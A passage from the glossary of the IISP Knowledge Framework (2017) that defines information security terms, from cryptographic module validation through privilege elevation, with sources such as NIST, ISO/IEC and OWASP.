Cryptographic A joint American and Canadian security accreditation program for
Module cryptographic modules against FIPS-140-2. The program is available
Validation to any vendors who seek to have their products certified for use by
Program the U.S. Government and regulated industries (such as financial and
health-care institutions) that collect, store, transfer, share and
disseminate "sensitive, but not classified" information.
Cryptography The science of information hiding and verification. It includes the NIST SP 800-175A
protocols, algorithms and methodologies to securely and
consistently prevent unauthorized access to sensitive information
and enable verifiability of the information. The main goals include
confidentiality, integrity authentication and source authentication.
Cyber Attack An attack, via cyberspace, targeting an enterprise’s use of NISTIR 7298
cyberspace for the purpose of disrupting, disabling, destroying, or
maliciously controlling a computing environment/infrastructure; or
destroying the integrity of the data or stealing controlled
information.
Cyber This brings the areas of information security, business continuity
Resilience and organisational resilience together. The objective of Cyber
Resilience is to maintain the organisation’s ability to deliver services
and intended outcomes despite adverse cyber events. Adverse
cyber events are those that negatively impact the availability,
integrity or confidentiality of IT systems and associated and services.
IISP Knowledge Framework Version 1.0 August 2017 Page 152 of 195
Term Definition Source
Cyber Scheme A non-for-profit organisation run by an independent Board of
Directors. The aim of the Cyber Scheme is to provide via training
and associated progressive qualifications a range of professional
capabilities in the areas of penetration testing, forensics, malware
analysis, risk assessment, risk management and related cyber
security capabilities.
Cyber Security The body of technologies, processes and practices designed to
protect networks, computers, programs and data from external
attack in cyberspace.
Cyberspace A global domain within the information environment consisting of NISTIR 7298
the interdependent network of information systems infrastructures
including the Internet, telecommunications networks, computer
systems, and embedded processors and controllers.
Data at Rest Inactive data that is stored physically in any digital form (e.g.
databases, data warehouses, spreadsheets, archives, tapes, off-site
backups, mobile devices etc.).
Data Controller A person who (either alone or jointly or in common with other Data Protection Act
persons) determines the purposes for which and the manner in
which any personal data are, or are to be, processed.
A data controller must be a “person” recognised in law, that is to
say:
• individuals;
• organisations; and
• other corporate and unincorporated bodies of persons.
Data Flow A graphical representation of the "flow" of data through an
Diagram information system, modelling its process aspects.
A Data Flow Diagram shows what kind of information will be input
to and output from the system, where the data will come from and
go to, and where the data will be stored.
Data Loss A set of controls used to make sure that end users do not send
Prevention sensitive or critical information outside the corporate network.
Data Processor “data processor”, in relation to personal data, means any person Data Protection Act
(other than an employee of the data controller) who processes the
data on behalf of the data controller;
Data Protection Defines how personal or customer information is used and
controlled by organisations or government bodies. Data Protection
laws includes strict guidelines and privacy policies on how to keep
information safe.
Data Protection The Data Protection Act 1998 is an act of the UK Parliament defining
Act the ways in which information about living people may be legally
used and handled. The main intent is to protect individuals against
misuse or abuse of information about them.
Data Protection A process which helps an organisation to identify and reduce the
Impact privacy risks of a project. An effective Data Protection Impact
Assessment Assessment (DPIA) is used throughout the development and
implementation of a project, using existing project management
processes. This is a term used with the GDPR.
Also known as a Privacy Impact Assessment.
Data Protection The Data Protection Officer (DPO) is person designated to take
Officer responsibility for data protection compliance within an
organisation.
IISP Knowledge Framework Version 1.0 August 2017 Page 153 of 195
Term Definition Source
Data Subject “Data subject” means an individual who is the subject of personal Data Protection Act
data.
Decryption The process of transforming ciphertext into plaintext for the
purpose of reading the information.
Deep Content A form of filtering that examines an entire file or MIME object as it
Inspection passes an inspection point, searching for viruses, spam, data loss,
key words or other content level criteria.
Defence in A principle for building systems stating that multiple defensive OWASP
Depth mechanisms at different layers of a system are usually more secure
than a single layer of defense. For example, when performing input
validation, one might validate user data as it comes in and then also
validate it before each use — just in case something was not caught,
or the underlying components are linked against a different front
end, etc.
Demilitarized Perimeter network (also known as a screened sub-net) inserted as a ISO/IEC 27033-1:2009
Zone “neutral zone” between networks.
Denial of Prevention of authorized access to a system resource or the ISO/IEC 27033-1:2009
Service delaying of system operations and functions, with resultant loss of
availability to authorized users.
Design Pattern A general reusable solution to a commonly occurring problem
within a given context. There are number of different types of
patterns – including software and architectural. Sometimes design
patterns are referred to as design templates.
Detective A security control used to identify and characterise an information
Control security incident.
Deterrent A security control used to reduce the likelihood of an attack.
control
Device Control Protects against data loss by monitoring and controlling data
transfers from PCs to removable storage devices such as USB drives.
Dictionary An attack against a cryptographic system, using precomputating OWASP
Attack values to build a dictionary. For example, in a password system, one
might keep a dictionary mapping ciphertext pairs in plaintext form
to keys for a single plaintext that frequently occurs. A large enough
key space can render this attack useless. In a password system,
there are similar dictionary attacks, which are somewhat alleviated
by salt. The end result is that the attacker — once he knows the salt
— can do a “Crack”-style dictionary attack. Crack-style attacks can
be avoided to some degree by making the password verifier
computationally expensive to compute. Or select strong random
passwords, or do not use a password-based system.
Digital Evidence Digital evidence is information stored or transmitted in binary form
that may be relied on in court. It can be found on a computer hard
drive, a mobile phone, a personal digital assistant (PDA), a CD, and a
flash card in a digital camera, among other places.
Digital A branch of forensic science encompassing the recovery and
Forensics investigation of material found in digital devices, often in relation to
computer crime.
Digital The result of a cryptographic transformation of data that, when NIST SP 800-175B
Signature properly implemented, provides the services of:
1. Source authentication,
2. Data integrity, and
3. Supports signer non-repudiation.
IISP Knowledge Framework Version 1.0 August 2017 Page 154 of 195
Term Definition Source
Disaster A set of policies and procedures to enable the recovery or
Recovery continuation of technology infrastructure and systems following a
natural or human-induced disaster. Disaster recovery focuses on the
IT or technology systems supporting critical business functions, as
opposed to business continuity, which involves keeping all essential
aspects of a business functioning despite significant disruptive
events. Disaster recovery is therefore a subset of business
continuity.
Discretionary A means of restricting access to objects (e.g., files, data entities) NISTIR 7298
Access Control based on the identity and need-to-know of subjects (e.g., users,
processes) and/or groups to which the object belongs. The controls
are discretionary in the sense that a subject with a certain access
permission is capable of passing that permission (perhaps indirectly)
on to any other subject (unless restrained by mandatory access
control).
Distributed DDoS is a type of Denial of Service (DoS) attack where multiple
Denial of compromised systems, which are often infected with a Trojan
Service Horse, are used to target a single system causing a DoS attack.
Dumpster A popular form of modern salvaging of waste in large commercial,
Diving residential, industrial and construction containers to find items that
have been discarded by their owners, but that may prove useful to
the picker.
In information security terms this means an attacker could retrieve
sensitive information, including personal data. It could allow an
attacker to launch a social engineering attack on an individual.
Eavesdropping Any attack on a data connection where one simply records or views OWASP
Attack data instead of tampering with the connection.
Encryption The process of transforming plaintext into ciphertext for the NIST SP 800-175A
purpose of security or privacy.
Endpoint Provides a collection of security utilities to protect PCs and tablets.
Protection Products usually include Application Control, Device Control, Port
Control, antivirus software and Web Application Firewall facilities.
Enterprise Also referred to as Enterprise Information Security Architecture
Security (EISA). This is a part of enterprise architecture focusing on
Architecture information security throughout the enterprise. It is the application
of comprehensive and rigorous methods for describing a current or
future structure and behaviour for an organisation's security
processes, information security systems, personnel and
organisation. Two frameworks of note are TOGAF and SABSA.
Entropy Refers to the inherent unknowability of data to external observers. OWASP
If a bit is just as likely to be a 1 as a 0 and a user does not know
which it is, then the bit contains one bit of entropy.
Evaluation Set of assurance requirements drawn from ISO/IEC 15408-3, ISO/IEC 15408
Assurance Level representing a point on the ISO/IEC 15408 predefined assurance
scale, that form an assurance package.
Fail Securely A security design principle. See failsafe.
Failsafe Concept used mainly in safety-critical or high-security system and
process designs, whereby a control failure leaves the
system/process in an inherently safe or secure condition, even if
that impairs availability.
False Negative A test result which wrongly indicates that a particular condition or Oxford English
attribute is absent Dictionary
IISP Knowledge Framework Version 1.0 August 2017 Page 155 of 195
Term Definition Source
False Positive A test result which wrongly indicates that a particular condition or Oxford English
attribute is present. Dictionary
Fault Tolerance A capability of a system or network to deliver uninterrupted service,
despite one or more of its components failing. The purpose is to
prevent catastrophic failure that could result from a single point of
failure.
Federated Identity for use in multiple domains, which together form an ISO/IEC 24760-1:2011
Identity identity federation.
NOTE 1 A federated identity may be jointly managed by identity
information providers of the federated domains.
NOTE 2 The shared attributes used in the federated domains may in
particular be used for identification, e.g. to support single-sign-on
(SSO).
NOTE 3 The federated identity may persist or may be a temporary
one, e.g. as single-sign-on identity.
IISP Knowledge Framework Version 1.0 August 2017 Page 156 of 195
Term Definition Source
Full Disk The encryption of all data on a disk drive, including the bootable
Encryption Operating System partition. It is performed by disk encryption
software or hardware that is installed on the drive during
manufacturing or via an additional software driver. It converts all
device data into a form that can be only understood by the one who
has the key to decrypt the encrypted data
Functional A software testing process used within software development in
Testing which software is tested to ensure that it conforms to all
requirements.
Fuzzing Fuzz testing or Fuzzing is a Black Box software testing technique, OWASP
which basically consists in finding implementation bugs using
malformed/semi-malformed data injection in an automated fashion.
General Data The General Data Protection Regulation (GDPR) (Regulation (EU)
Protection 2016/679) is a Regulation by which the European Parliament, the
Regulation Council and the European Commission intend to strengthen and
unify data protection for individuals within the European Union.
Governance The system by which an organization’s information security ISO/IEC 27000:2016
activities are directed and controlled.
Governing Body Person or group of people who are accountable for the ISO/IEC 27000:2016
performance and conformance of the organization.
Gramm-Leach- This US federal Act is also known as the Financial Modernization Act
Bliley Act of 1999. The Act includes provisions to protect consumers' personal
financial information held by financial institutions.
Guideline A general rule, principle, or piece of advice. Oxford English
Dictionary
Hardening Elimination of as many security risks as possible on an application,
device or operating system. This is typically done by removing all
non-essential services, software programs and utilities to reduce the
attack surface. Also all default user account and passwords should
be removed.
Hash Function See cryptographic hash function. NIST SP 800-175B
Hash Value The result of applying a hash function to information; also called a NIST SP 800-175B
message digest.
Heuristics Proceeding to a solution by trial and error or by rules that are only Oxford English
loosely defined Dictionary
Honey Pot A strategy of setting up resources which an attacker believes are OWASP
real but are in fact designed specifically to catch the attacker.
Host Intrusion HIDS. These products attempts to identify unauthorised, illicit, and
Detection anomalous behaviour on a specific device, whether it is a server or
System workstation. HIDS generally involves an agent installed on each
system, monitoring and alerting on local OS and application activity.
The installed agent uses a combination of signatures, rules, and
heuristics to identify unauthorised activity. Like a NIDS, the role of a
HIDS is passive, only gathering, identifying, logging, and alerting.
Host Intrusion HIPS. Similar to a HIDS except they can be configured to block
Prevention activity. Most products in this space can operate in either HIDS or
System HIPS mode, and usually on a rule by rule basis.
HTTP HTTP (Hypertext Transfer Protocol) is the set of rules for
transferring files (text, graphic images, sound, video, and other
multimedia files) on the World Wide Web. HTTP is an application
protocol that runs on top of the TCP/IP suite of protocols.
IISP Knowledge Framework Version 1.0 August 2017 Page 157 of 195
Term Definition Source
HTTPS HTTPS (HTTP over SSL or HTTP Secure) is the use of Secure Socket
Layer (SSL) or Transport Layer Security (TLS) to carry HTTP
application traffic.
Human Factors Human factors and ergonomics is the practice of designing
products, systems, or processes to take proper account of the
interaction between them and the people who use them.
Human Rights The Human Rights Act 1998 is a UK Act of Parliament. Its aim is to
Act incorporate into UK law the rights contained in the European
Convention on Human Rights.
Hybrid Cloud The cloud infrastructure is a composition of two or more distinct NIST_SP_800_145
cloud infrastructures (private, community, or public) that remain
unique entities, but are bound together by standardized or
proprietary technology that enables data and application portability
(e.g., cloud bursting for load balancing between clouds).
IAMM Information Assurance Maturity Model and Assessment Framework.
A tool used by the UK Government to assess the effectiveness of the
implementation of the Security Policy Framework (SPF). Although an
independent IAMM audit is not mandated, each UK Government
Department is required to deliver a report on the state of the SPF
controls in its annual statement on internal control. This report
must include details of how supply chain partners are meeting IA
best practice.
Identification Process of recognizing an entity in a particular domain as distinct ISO/IEC 24760-1:2011
from other entities
NOTE 1 The process of identification applies verification to claimed
or observed attributes.
NOTE 2 Identification typically is part of the interactions between an
entity and the services in a domain and to access resources.
Identification may occur multiple times while the entity is known in
the domain.
IISP Knowledge Framework Version 1.0 August 2017 Page 158 of 195
Term Definition Source
Identity Processes and policies involved in managing the lifecycle and value, ISO/IEC 24760-1:2011
Management type and optional metadata of attributes in identities known in a
particular domain
NOTE 1 In general identity management is involved in interactions
between parties where identity information is processed.
NOTE 2 Processes and policies in identity management support the
functions of an identity information authority where applicable, in
particular to handle the interaction between an entity for which an
identity is managed and the identity information authority.
IISP Knowledge Framework Version 1.0 August 2017 Page 159 of 195
Term Definition Source
Information Preservation of confidentiality, integrity and availability of ISO/IEC 27000:2016
Security information.
IISP Knowledge Framework Version 1.0 August 2017 Page 160 of 195
Term Definition Source
Intrusion Technical system that is used to identify that an intrusion has been ISO/IEC 27033-1:2009
Detection attempted, is occurring, or has occurred and possibly respond to
System intrusions in information systems and networks.
Intrusion Variant on intrusion detection systems that are specifically designed ISO/IEC 27033-1:2009
Prevention to provide an active response capability.
System
Investigatory The Investigatory Powers Act 2016 is an Act of the Parliament of the
Powers Act United Kingdom and provides a framework to govern the use and
oversight of investigatory powers by law enforcement and the
security and intelligence agencies in the UK
Investigatory Investigatory Powers Commission ensure the public and Parliament
Powers are informed about how the powers laid out in the Investigatory
Commission Powers Act are used. The Investigatory Powers Commissioner
reports annually and will have the power to report more frequently
on any matter that they considers appropriate.
IoT Security The IoT Security Foundation (IoTSF). A non-profit organisation
Foundation dedicated to driving security excellence. Its mission is to help secure
the Internet of Things, in order to aid its adoption and maximise its
benefits.
IP Address An identifier for a computer or device on a TCP/IP network, such as
the Internet. Networks using the TCP/IP protocol route messages
based on the IP address of the destination.
IP Packet A segment of data sent from one computer or device to another
over a network. A packet contains the source IP address, destination
IP address, size, type, data, and other useful information that helps
the packet get to its destination and be read
IPsec A set of protocols that provides security for Internet Protocol.
IRAM2 Information Risk Analysis Methodology 2 (IRAM2) produced by the
Information Security Forum (ISF). ISF have also produced an
associated Risk Management Tool.
ISO/IEC 15408 ISO/IEC 15408. A three part standard.
ISO/IEC 15408-1:2009. Information technology -- Security
techniques -- Evaluation criteria for IT security -- Part 1: Introduction
and general model.
ISO/IEC 15408-2:2008. Information technology -- Security
techniques -- Evaluation criteria for IT security -- Part 2: Security
functional components.
ISO/IEC 15408-3:2008. Information technology -- Security
techniques -- Evaluation criteria for IT security -- Part 3: Security
assurance components
ISO/IEC 21827 ISO/IEC 21827:2008. Information technology -- Security techniques -
- Systems Security Engineering -- Capability Maturity Model® (SSE-
CMM®).
ISO 22301 ISO 22301:2012. Societal security -- Business continuity
management systems --- Requirements.
ISO 22313 ISO 22313:2012. Societal security -- Business continuity
management systems – Guidance.
ISO/IEC 24760 ISO/IEC 24760-1:2011 Information technology -- Security techniques
-- A framework for identity management -- Part 1: Terminology and
concepts.
ISO/IEC 27000 ISO/IEC 27000:2016. Information technology — Security techniques
— Information security management systems — Overview and
vocabulary. Part of the ISO/IEC 27000 family of standards.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 161 of 195
Term Definition Source
ISO/IEC 27000 The ISO/IEC 27000 family of mutually supporting information
family security standards (also known as the ISO 27000 series) is developed
and published by the International Organization for Standardization
(ISO) and the International Electrotechnical Commission (IEC) to
provide a globally recognised framework for best-practice
information security management.
ISO 27001 Lead The ISO/IEC 27001 Lead Auditor certification consists of a
Auditor professional certification for auditors specialising in information
security management systems (ISMS)
ISO/IEC 27001 ISO/IEC 27001:2013. Information technology — Security techniques
—Information security management systems —Requirements. Part
of the ISO/IEC 27000 family of standards.
ISO/IEC 27002 ISO/IEC 27002:2013. Information technology -- Security techniques -
- Code of practice for information security controls. Part of the
ISO/IEC 27000 family of standards.
ISO/IEC 27005 ISO/IEC 27005:2011. Information technology — Security techniques
—Information security risk management. Part of the ISO/IEC 27000
family of standards. Part of the ISO/IEC 27000 family of standards.
ISO/IEC 27006 ISO/IEC 27006:2015. Information technology — Security techniques
— Requirements for bodies providing audit and certification of
information security management systems
ISO/IEC 27014 ISO/IEC 27014:2013 Information technology — Security techniques
— Governance of information security. Part of the ISO/IEC 27000
family of standards
ISO/IEC 27033- ISO/IEC 27033-1:2009. Information technology — Security
1 techniques — Network security —Part 1: Overview and concepts
ISO/IEC 27035 ISO/IEC 27035-1:2016. Information technology -- Security
techniques -- Information security incident management -- Part 1:
Principles of incident management.
ISO/IEC 27035-2:2016. Information technology -- Security
techniques -- Information security incident management -- Part 2:
Guidelines to plan and prepare for incident response
ISO 31000 ISO 31000:2009. Risk management – Principles and guidelines
ISO 9000 ISO 9000:2015. Quality management systems -- Fundamentals and
vocabulary.
ISO Guide 73 Risk management — Vocabulary. First edition 2009.
ITIL A set of detailed practices for IT service management (ITSM). It
describes processes, procedures, tasks, and checklists for different
stages in the ITSM lifecycle. Formally an acronym for Information
Technology Infrastructure Library
Kali Linux Kali Linux is an open source Debian-derived Linux distribution
designed for digital forensics and penetration testing. Kali Linux is
preinstalled with over 300 penetration-testing programs.
Key A random piece of data used with encryption and decryption.
Encryption and decryption algorithms require a key and plaintext or
ciphertext to produce ciphertext or plaintext, respectively. Keys are
usually very large randomly generated numbers.
Key Distribution The mechanism used to delivering cryptographic keys to required
parties.
Key Exchange The process of two parties agreeing on a shared secret, usually OWASP
implying that both parties contribute to the key.
IISP Knowledge Framework Version 1.0 August 2017 Page 162 of 195
Term Definition Source
Key The activities involving the handling of cryptographic keys and other
Management related security parameters during the entire life cycle of the keys,
including the generation, storage, establishment, entry and output,
and destruction.
Key Pair A pair of cryptographic keys consisting of a public key and a private
key associated with an asymmetric cipher. They have a
mathematical relationship with each other.
Key Size The size of a cryptographic key. Usually specified in bits.
Key Space All possible values used to construct cryptographic keys. The larger
the key space the better. In the case of a 64-bit key, the key space is
64
2 to the power of 64 (2 ). In other words, the number of possible
values of the key, i.e. the key space, is 18,446,744,073,709,600,000.
Least Privilege All processes should run with the minimal possible set of privileges
and should retain those privileges for the minimal amount of time
possible.
Legislation Laws, considered collectively. Oxford English
Dictionary
Level of Risk Magnitude of a risk expressed in terms of the combination of
consequences and their likelihood.
Lightweight LDAP is an open, vendor-neutral, industry standard application
Directory protocol for accessing and maintaining distributed directory
Access Protocol information services over an Internet Protocol network.
Likelihood Chance of something happening ISO/IEC 27005:2011
Mail Filtering Inspection of incoming email and removal of spam and computer
viruses using antivirus software. A less common use is to inspect
outgoing email and enforce some type of Data Loss Prevention
policy.
Malware Software which is specifically designed to disrupt, damage, or gain Oxford English
authorized access to a computer system. Dictionary
Mandatory A means of restricting access to objects based on the sensitivity (as NISTIR 7298
Access Control represented by a security label) of the information contained in the
objects and the formal authorization (i.e., clearance, formal access
approvals, and need-to-know) of subjects to access information of
such sensitivity.
Man-in-the- An eavesdropping attack where a client’s communication with a OWASP
middle Attack server is proxied by an attacker. Generally, the implication is that
the client performs a cryptographic key exchange with an entity and
fails to authenticate that entity, thus allowing an attacker to look
like a valid server.
Message Digest See Hash Value. NIST SP 800-175B
Methodology A system of methods used in a particular area of study or activity. Oxford English
Dictionary
MIME Multipurpose Internet Mail Extensions is an Internet standard that
extends the format of email to support:
• Text in character sets other than ASCII.
• Non-text attachments: audio, video, images, application
programs etc.
• Message bodies with multiple parts.
Minimisation Do not execute any software, applications, or services that are not
required. Do not install any software you are not using. A security
design principle.
Mitigation The action of reducing the severity, seriousness, or painfulness of Oxford English
something. Dictionary
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 163 of 195
Term Definition Source
Multifactor Authentication using two or more factors to achieve authentication. NISTIR 7298
Authentication Factors include: (i) something you know (e.g. password/PIN); (ii)
something you have (e.g., cryptographic identification device,
token); and (iii) something you are (e.g., biometric).
Mutual A process or technology in which both entities in a communications
Authentication link authenticate each other. In a network environment, the client
authenticates the server and vice-versa. Also called two-way
authentication.
National Cyber The National Cyber Security Centre (NCSC) is the UK’s authority on
Security Centre cyber security. It is part of GCHQ. The NCSC brings together and
replaces CESG (the information security arm of GCHQ), the Centre
for Cyber Assessment (CCA), Computer Emergency Response Team
UK (CERT UK) and the cyber-related responsibilities of the Centre for
the Protection of National Infrastructure (CPNI).
National The National Institute of Standards and Technology (NIST) is a OWASP
Institute of division of the U.S. Department of Commerce. NIST issues standards
Standards and and guidelines, with the hope that they will be adopted by the
Technology computing community.
National The National Vulnerability Database (NVD) is a U.S. government
Vulnerability repository of standards based vulnerability management data.
Database
Need-To-Know A method of isolating information resources based on a user’s need NISTIR 7298
to have access to that resource in order to perform their job but no
more. The terms ‘need-to know” and “least privilege” express the
same idea. Need-to-know is generally applied to people, while least
privilege is generally applied to processes.
Negative Test Checks if a function/method behaves as expected with bad input
and can correctly handle error conditions.
Network NIDS. These products attempt to identify unauthorised, illicit, and
Intrusion anomalous behaviour based solely on network traffic as the traffic
Detection traverses a NIDS sensor. A NIDS, using either a network tap, span
System port, or hub collects IP packets that traverse a given network. Using
the captured data, the NIDS system processes and flags, and
optionally reports or alerts, any suspicious traffic. The role of a NIDS
is passive, only gathering, identifying, logging and alerting.
Network NIPS. Very similar to a NIDS except this device actually blocks any
Intrusion traffic it believes to be suspicious. Most network products of this
Prevention type can be configured to operate in either NIDS or NIPS mode.
System
Network A NOC, also known as a "network management centre", is one or
Operation more locations from which network monitoring and control, or
Centre network management, is exercised over a network.
Network Router Network device that is used to establish and control the flow of data ISO/IEC 27033-1:2009
between different networks by selecting paths or routes based
upon routing protocol mechanisms and algorithms.
Network Switch Device which provides connectivity between networked devices by ISO/IEC 27033-1:2009
means of internal switching mechanisms, with the switching
technology typically implemented at layer 2 or layer 3 of the OSI
reference model.
NIST SP 500- NIST Special Publication 500-292. NIST Cloud Computing Reference
292 Architecture. (September 2011)
IISP Knowledge Framework Version 1.0 August 2017 Page 164 of 195
Term Definition Source
NIST SP 800 NIST Special Publication 800-175A. Guideline for Using
-175A Cryptographic Standards in the Federal Government: Directives,
Mandates and Policies (August 2016).
NIST SP 800- NIST Special Publication 800-145. The NIST Definition of Cloud
145 Computing (September 2011)
NIST SP 800- NIST Special Publication 800-146. Cloud Computing Synopsis and
146 Recommendations (May 2012)
NIST SP 800- NIST Special Publication 800-175A. Guideline for Using
175B Cryptographic Standards in the Federal Government: Cryptographic
Mechanisms (August 2016).
NIST SP 800-30 NIST Special Publication 800-30. Guide for Conducting Risk
Assessments. (September 2012)
NISTIR 7298 NIST Internal/Interagency Reports (NISTIR) 7298 revision 2 Glossary
of Key Information Security Terms (May 2013)
(http://nvlpubs.nist.gov/nistpubs/ir/2013/NIST.IR.7298r2.pdf )
Non- Ability to prove the occurrence of a claimed event or action and its ISO/IEC 27000:2016
repudiation originating entities.
OASIS The Organization for the Advancement of Structured Information
Standards (OASIS) is a global non-profit consortium that works on
the development, convergence, and adoption of standards for
security, Internet of Things, energy, content technologies,
emergency management, and other areas.
Obfuscate Make obscure, unclear, or unintelligible. Oxford English
Dictionary
Some malware hides its code in this way to make it harder for
security software to detect or remove it.
Object A piece of data or a resource.
OCTAVE OCTAVE Allegro is a risk management methodology to streamline
and optimise the process of assessing information security risks so
that an organisation can obtain sufficient results with a small
investment in time, people, and other limited resources. Developed
by the Software Engineering Institute (SEI) within Carnegie Mellon
University
O-ESA Open Enterprise Security Architecture (O-ESA). O-ESA introduces
the notion of design patterns with the explanation of a number of
conceptual and logical security architectures for particular areas of
an IT system. It also describes a number of security services.
Open Source Opens Source Intelligence (OSINT) is intelligence created from
Intelligence public or open source information, including that published in the
media, or legislation, annual reports, or directories, or available
from conferences, theses, studies, websites, photographic satellites,
or maps, among others.
OWASP The Open Web Application Security Project (OWASP). A not-for-
profit charitable international organisation that publishes freely-
available articles, methodologies, standards documentation, tools,
and technologies in the field of web application security.
OWASP Top 10 OWASP publish a number of “Top Ten” lists. The most famous, and
what most people mean by the “Top Ten” is the OWASP Top 10
Most Critical Web Application Security Risks on what its members
consider to be the top 10 most critical web application security
flaws are.
Packet Filtering Passing or blocking packets at a network interface based on source
and destination IP addresses, ports, or protocols.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 165 of 195
Term Definition Source
PAS 754 PAS 754:2014. Software Trustworthiness. Governance and
management. Specification.
A PAS (Publicly Available Specification) from BSI which identifies five
aspects of software trustworthiness: Safety, reliability, availability,
resilience and security. It defines a set of principles and techniques
for any software implementation. Currently undergoing BSI
standardisation work.
Passphrase A synonym for “password,” meant to encourage people to use OWASP
longer (it is hoped, more secure) values.
Password A secret string of characters that should only be known by one
person and can therefore be used to authenticate them.
Password Aging A mechanism used to force a user to change their password after a
defined period of time.
Password A scheme where special characters, numbers, a mix of lower and
Complexity upper case characters are used in a password in order to prevent
brute force attacks.
Password File A file or databases containing user or other subject’s passwords.
They are normally held in a hashed form.
Password An attempt to determine user credentials through the process of
Guessing Attack attempting to log in repeatedly. This is generally done by using
commonly used or default passwords—attempting every possible
combination until successful
Password Reset A facility that allows a user, an administrator or a helpdesk operator
to reset a user’s password to a desired new value, regardless of its
current value.
Password A measure of the effectiveness of a password in resisting guessing
Strength and brute-force attacks. The strength of a password is a function of
length, complexity, and unpredictability.
Patch An area of systems management that involves acquiring, testing,
Management and installing multiple patches (code changes) to an administered
computer system. Patch management tasks include: maintaining
current knowledge of available patches, deciding what patches are
appropriate for particular systems, ensuring that patches are
installed properly, testing systems after installation, and
documenting all associated procedures, such as specific
configurations required.
PCI DSS The Payment Card Industry Data Security Standard (PCI DSS) is a
proprietary information security standard for organisations that
handle branded credit cards from the major card schemes. The PCI
Standard is mandated by the card brands and administered by the
Payment Card Industry Security Standards Council. The standard
defines the security controls needed to protect cardholder data and
hence aim to reduce credit card fraud.
Penetration Is a simulated attack whereby the penetration tester uses tools of
Testing the hacking trade to attempt to break into a system, network,
device or application.
Permission An approval for a subject to perform an operation on one or more
protected objects. The set of operations supported depends on the
access control model and can include: read, write, delete, execute
and search.
IISP Knowledge Framework Version 1.0 August 2017 Page 166 of 195
Term Definition Source
Personal Data Personal data” means data which relate to a living individual who Data Protection Act
can be identified—
(a)from those data, or
(b)from those data and other information which is in the possession
of, or is likely to come into the possession of, the data controller,
and includes any expression of opinion about the individual and any
indication of the intentions of the data controller or any other
person in respect of the individual;
Personal A numeric password used on systems with numeric keypads instead
Identification of full alphanumeric keyboards. PIN is often misused as a synonym
Number for password
Personnel The controls and procedures that are established to ensure that all
Security personnel who have access to sensitive information have the
Controls required authority as well as appropriate clearances. Procedures
confirm a person’s background and provide assurance of necessary
trustworthiness.
Pharming A malicious website that resembles a legitimate website, used to
gather usernames and passwords.
Phishing A malicious technique used to gather sensitive information (credit
card data, usernames and passwords, etc.) from users. The
attackers pretend to be a trustworthy entity to bait the victims into
trusting them and revealing their confidential data.
Physical Controls and procedures put into place to prevent intruders from
Security physically accessing a system or facility. The controls enforce access
Controls control and authorised access.
Plaintext Intelligible data that has meaning and can be understood without NIST SP 800-175A
the application of cryptography.
Platform as a The capability provided to the consumer is to deploy onto the cloud NIST_SP_800_145
Service infrastructure consumer-created or acquired applications created
using programming languages, libraries, services, and tools
supported by the provider. The consumer does not manage or
control the underlying cloud infrastructure including network,
servers, operating systems, or storage, but has control over the
deployed applications and possibly configuration settings for the
application-hosting environment
Policy Intentions and direction of an organization as formally expressed by ISO/IEC 27000:2016
its top management
Polymorphic Polymorphic malware is harmful, destructive or intrusive computer
Malware software such as a virus, worm, trojan or spyware that constantly
changes ("morphs"), making it difficult to detect with anti-malware
programs.
Port Control Protects against data loss by monitoring and controlling access to
device ports on a user workstation.
Port Scanning Using a program to remotely determine which ports on a system are NISTIR 7298
open (e.g., whether systems allow connections through those
ports).
Positive Test Checks if a function/method behaves as expected with its expected
input.
Predict, Predict, Prevent, Detect, Respond (PPDR) is framework published by
Prevent, the analysts Gartner. It is a useful tool to communicate an
Detect, organisation’s strategy and approach to security.
Respond
IISP Knowledge Framework Version 1.0 August 2017 Page 167 of 195
Term Definition Source
Pre-production An environment for final testing immediately prior to deploying to
production. It seeks to mirror the actual production environment as
closely as possible, and may connect to other production services
and data, such as databases.
Pretty Good An encryption program that provides confidentiality and
Privacy authentication for data communication. PGP is often used for
signing, encrypting, and decrypting texts, e-mails, files, directories,
and whole disk partitions and to increase the security of e-mail
communications.
Preventive A security control designed to prevent an information security
Control incident from occurring.
Primary Primary Account Number (PAN) also referred to as “account PCI DSS
Account number.” Unique payment card number (typically for credit or debit
Number cards) that identifies the issuer and the particular cardholder
account.
Privacy Informational privacy is the ability of a person to control, edit,
manage and delete information about themselves and to decide
how and to what extent such information is communicated to
others. Intrusion can come in the form of collection of excessive
personal information, disclosure of personal information without
consent and misuse of such information. It can include the
collection of information through the surveillance or monitoring of
how people act in public or private spaces and through the
monitoring of communications whether by post, phone or online
and extends to monitoring the records of senders and recipients as
well as the content of messages
Privacy and The Privacy and Electronic Communications (EC Directive)
Electronic Regulations 2003 (PECR) is a law in the UK which makes it unlawful
Communications to, amongst other things, transmit an automated recorded message
Regulations for direct marketing purposes via a telephone, without prior
consent of the subscriber. It also covers the use of cookies. It
implements an EC directive and has been amended a number of
times.
Privacy Impact Also known as a Data Protection Impact Assessment.
Assessment
Private Cloud The cloud infrastructure is provisioned for exclusive use by a single NIST_SP_800_145
organization comprising multiple consumers (e.g., business units). It
may be owned, managed, and operated by the organization, a third
party, or some combination of them, and it may exist on or off
premises.
Private Key Key of an asymmetric key pair which can only be used by the owner
of that key. Hence it must be kept secret.
Privilege An identified right that a particular user has to a particular system
resource, such as a file folder, the use of certain system commands,
or an amount of storage.
Privilege A vulnerability that lets a hacker elevate their privilege and hence
Elevation do things on a PC, network or server that they otherwise wouldn't
be able to. This occurs when an unprivileged user gains privileged
status.
IISP Knowledge Framework Version 1.0 August 2017 Page 168 of 195
Term Definition Source
Procedural Security controls that mitigate identified risks by way of policies,
